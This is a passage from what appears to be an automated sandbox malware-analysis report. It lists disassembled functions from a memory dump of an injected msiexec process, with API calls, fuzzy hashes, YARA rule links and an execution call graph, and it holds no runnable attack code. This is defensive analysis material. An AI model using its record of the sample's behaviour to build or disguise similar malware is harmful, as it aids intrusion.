                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 8a282d0802ebcab225b7d734bf4817301ec33e734c1d5bee7de6548ec9017cde
                                                                    • Instruction ID: de1932c351549e969897e644077d6639e7b291e9f08f3ad8eedf421d16537174
                                                                    • Opcode Fuzzy Hash: 8a282d0802ebcab225b7d734bf4817301ec33e734c1d5bee7de6548ec9017cde
                                                                    • Instruction Fuzzy Hash: 1A31EE72E0026AAFDF249F64CC84DAF7BB6EB54614F1401E9EC04D6250EB35C851CBA8
                                                                    Function 234BC7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(234BC7DD), ref: 234BC7E6
                                                                    • GetModuleHandleA.KERNEL32(?,234BC7DD), ref: 234BC838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 234BC860
                                                                      • Part of subcall function 234BC803: GetProcAddress.KERNEL32(00000000,234BC7F4), ref: 234BC804
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID:
                                                                    • API String ID: 1646373207-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: 046cc0f64155d5373335f5d4008bb27cd6f1aefe976b746b871ccbe7da636f2c
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: 7501C800D453412CEA2166740CC19AA5FBF9B37963B181ADAA150CA293D9908F0783FD
                                                                    Function 234B5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,234B1D66,00000000,00000000,?,234B5C88,234B1D66,00000000,00000000,00000000,?,234B5E85,00000006,FlsSetValue), ref: 234B5D13
                                                                    • GetLastError.KERNEL32(?,234B5C88,234B1D66,00000000,00000000,00000000,?,234B5E85,00000006,FlsSetValue,234BE190,FlsSetValue,00000000,00000364,?,234B5BC8), ref: 234B5D1F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,234B5C88,234B1D66,00000000,00000000,00000000,?,234B5E85,00000006,FlsSetValue,234BE190,FlsSetValue,00000000), ref: 234B5D2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 6580412767f41a4283313543ee6c77a282f72c068b4f6478597114245e607dd1
                                                                    • Instruction ID: 0555cbec403a2299debfdf6418f26097762395b74a9f037d65fb3a63fe45ad69
                                                                    • Opcode Fuzzy Hash: 6580412767f41a4283313543ee6c77a282f72c068b4f6478597114245e607dd1
                                                                    • Instruction Fuzzy Hash: DE01FC36E052226BC3156E789C4CE46B7FEAF066E571447E1FA15E7240DB24D402CAF4
                                                                    Function 234B63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B655C
                                                                      • Part of subcall function 234B62BC: IsProcessorFeaturePresent.KERNEL32(00000017,234B62AB,00000000,?,?,?,?,00000016,?,?,234B62B8,00000000,00000000,00000000,00000000,00000000), ref: 234B62BE
                                                                      • Part of subcall function 234B62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 234B62E0
                                                                      • Part of subcall function 234B62BC: TerminateProcess.KERNEL32(00000000), ref: 234B62E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                    • String ID: *?$.
                                                                    • API String ID: 2667617558-3972193922
                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction ID: 969fc28233c570336a01ca39662ed6577e085a818722ce7167029018137ab152
                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction Fuzzy Hash: 9951A675E00209EFDB14DFA8C880AADBBFAFF58714F1441EDD454E7345D6399A018B68
                                                                    Function 234B16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: : $Se.
                                                                    • API String ID: 4218353326-4089948878
                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction ID: 73cfe0f5455ccd0f911ab602702187a6bb64ba8778881fcc3c61569827fbb729
                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction Fuzzy Hash: 6511C471E00348AFCB10DFA89840BDDFBFDAF19604F5440DAE545E7212E6705B028779
                                                                    Function 234B1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 234B2903
                                                                      • Part of subcall function 234B35D2: RaiseException.KERNEL32(?,?,?,234B2925,00000000,00000000,00000000,?,?,?,?,?,234B2925,?,234C21B8), ref: 234B3632
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 234B2920
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: 2971a5d0141f077d01f24d10344fad749f6b100a1f82be6ba92093e0e05501ba
                                                                    • Instruction ID: 67373e96d73d4146c364f0004a96cc3adb006fa0e3c674fde11e874968e7dbc4
                                                                    • Opcode Fuzzy Hash: 2971a5d0141f077d01f24d10344fad749f6b100a1f82be6ba92093e0e05501ba
                                                                    • Instruction Fuzzy Hash: 60F0F434E1030C7B8F04B6A5EC44D9A737E9B20A50B9046F5AE64D2190EF71EA16C5FC
                                                                    Function 234B69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetOEMCP.KERNEL32(00000000,?,?,234B6C7C,?), ref: 234B6A1E
                                                                    • GetACP.KERNEL32(00000000,?,?,234B6C7C,?), ref: 234B6A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |lK#
                                                                    • API String ID: 0-4035581376
                                                                    • Opcode ID: 88911f21b1515668068c99522376fcaaa25715455101022fd7c6e472ca8d19ea
                                                                    • Instruction ID: 9d461fd1fc6f9d5d1a51d2838bbbe5744ac70a74ae7d0509ae6cb32990e3ef85
                                                                    • Opcode Fuzzy Hash: 88911f21b1515668068c99522376fcaaa25715455101022fd7c6e472ca8d19ea
                                                                    • Instruction Fuzzy Hash: 3EF08C30E00108CBDB00EB68C4487AC77B6FB16339F144BC8E4389A2C1EB7D89468B68

                                                                    Execution Graph

                                                                    Execution Coverage:5.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:1.3%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:73
                                                                    execution_graph 40289 441819 40292 430737 40289->40292 40291 441825 40293 430756 40292->40293 40294 43076d 40292->40294 40295 430774 40293->40295 40296 43075f 40293->40296 40294->40291 40307 43034a memcpy 40295->40307 40306 4169a7 11 API calls 40296->40306 40299 4307ce 40300 430819 memset 40299->40300 40308 415b2c 11 API calls 40299->40308 40300->40294 40301 43077e 40301->40294 40301->40299 40304 4307fa 40301->40304 40303 4307e9 40303->40294 40303->40300 40309 4169a7 11 API calls 40304->40309 40306->40294 40307->40301 40308->40303 40309->40294 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 